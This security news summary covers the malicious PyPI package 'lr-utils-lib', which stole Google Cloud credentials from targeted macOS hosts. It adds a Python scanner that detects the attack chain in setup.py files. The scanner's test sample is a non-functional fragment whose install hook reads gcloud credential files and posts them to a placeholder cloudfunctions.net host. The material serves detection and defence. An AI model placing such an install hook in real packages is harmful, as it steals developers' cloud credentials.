Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials

July 27, 2024 at 02:00AM

Cybersecurity researchers found a malicious package, “lr-utils-lib”, on the Python Package Index that targets specific Apple macOS systems to steal Google Cloud credentials. On installation it checks that it is running on macOS, compares the host's UUID against a set of hard-coded hashes, and only then harvests Google Cloud data, which it sends to a remote server. The accompanying social engineering tactics suggest a targeted attack.

Key takeaways:

– Cybersecurity researchers discovered a malicious package named “lr-utils-lib” on the Python Package Index that targeted Apple macOS systems to steal users’ Google Cloud credentials.
– The package had a narrow pool of victims, with only 59 downloads before it was taken down in early June 2024.
– The malware used predefined hashes to target specific macOS machines, attempting to harvest Google Cloud authentication data and transmit it to a remote server.
– Notably, the package first checks that it is being installed on a macOS system and then compares the host's UUID against a hard-coded list of UUID hashes before taking any further action.
– The captured information was transmitted over HTTP to a remote server, “europe-west2-workload-422915[.]cloudfunctions[.]net”.
– A fake LinkedIn profile under the name “Lucid Zenith”, matching the name of the package’s owner, was found, suggesting a social engineering element to the attack.
– The attack indicates that the threat actors had prior knowledge of the macOS systems they wanted to infiltrate and used lookalike package names to distribute the malware.
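
As an added illustration (not code from the original article or from the package itself), the following Python scanner flags a `setup.py` that combines the behaviours described above: an install-time hook, a macOS platform gate, a hardware-UUID hash comparison, a read of Google Cloud credential files, and an HTTP call to a `cloudfunctions.net` endpoint. The regexes, the threshold and both sample inputs are constructed for this example; the malicious sample is a deliberately non-functional fragment with placeholder values.

```python
import re

# Indicator patterns for the behaviour chain described above (constructed
# regexes written for this example; they are not the original package's code).
INDICATORS = {
    "macos_check": re.compile(r"""platform\.system\(\)\s*[!=]=\s*['"]Darwin['"]|sys\.platform\s*[!=]=\s*['"]darwin['"]"""),
    "hardware_uuid": re.compile(r"IOPlatformUUID|\bioreg\b|system_profiler"),
    "hash_compare": re.compile(r"hashlib\.(?:sha256|sha1|md5)\("),
    "gcloud_creds": re.compile(r"\.config/gcloud|application_default_credentials\.json|gcloud auth"),
    "cloudfunctions_exfil": re.compile(r"""https?://[^\s'"]*cloudfunctions\.net"""),
    "install_hook": re.compile(r"cmdclass\s*=|class\s+\w+\s*\(\s*(?:install|develop)\s*\)"),
}

def scan_setup_source(src: str, threshold: int = 3) -> dict:
    """Report which indicators fire in a setup.py source and whether the
    combination crosses the review threshold (single hits are common in
    legitimate packages; the chain together is what is suspicious)."""
    hits = {name: bool(pat.search(src)) for name, pat in INDICATORS.items()}
    score = sum(hits.values())
    return {"hits": hits, "score": score, "suspicious": score >= threshold}

# Constructed, non-functional fragment mirroring the described chain:
# platform gate -> UUID hash gate -> gcloud credential read -> HTTP exfil.
SUSPICIOUS_SETUP = '''
from setuptools.command.install import install
class PostInstall(install):
    def run(self):
        install.run(self)
        if platform.system() != "Darwin":
            return
        digest = hashlib.sha256(...).hexdigest()  # host UUID via ioreg (elided)
        if digest not in HARD_CODED_HASHES:
            return
        data = open(os.path.expanduser("~/.config/gcloud/application_default_credentials.json")).read()
        requests.post("https://placeholder-project.cloudfunctions.net/collect", data=data)
setup(name="lookalike-utils", cmdclass={"install": PostInstall})
'''

# Constructed benign setup.py for comparison: no indicator should fire.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="utils-lib", version="1.0", packages=find_packages())
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, scan_setup_source(src))
```

Run it against the extracted `setup.py` of an sdist before installing; a score of three or more is a prompt for manual review, not proof of malice.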

The implications of such attacks are significant, especially for enterprises: the initial compromise usually occurs on an individual developer’s machine, but the credentials taken there can expose the organisation’s cloud environment. This highlights the importance of vigilance and security measures to protect against targeted supply-chain attacks of this kind.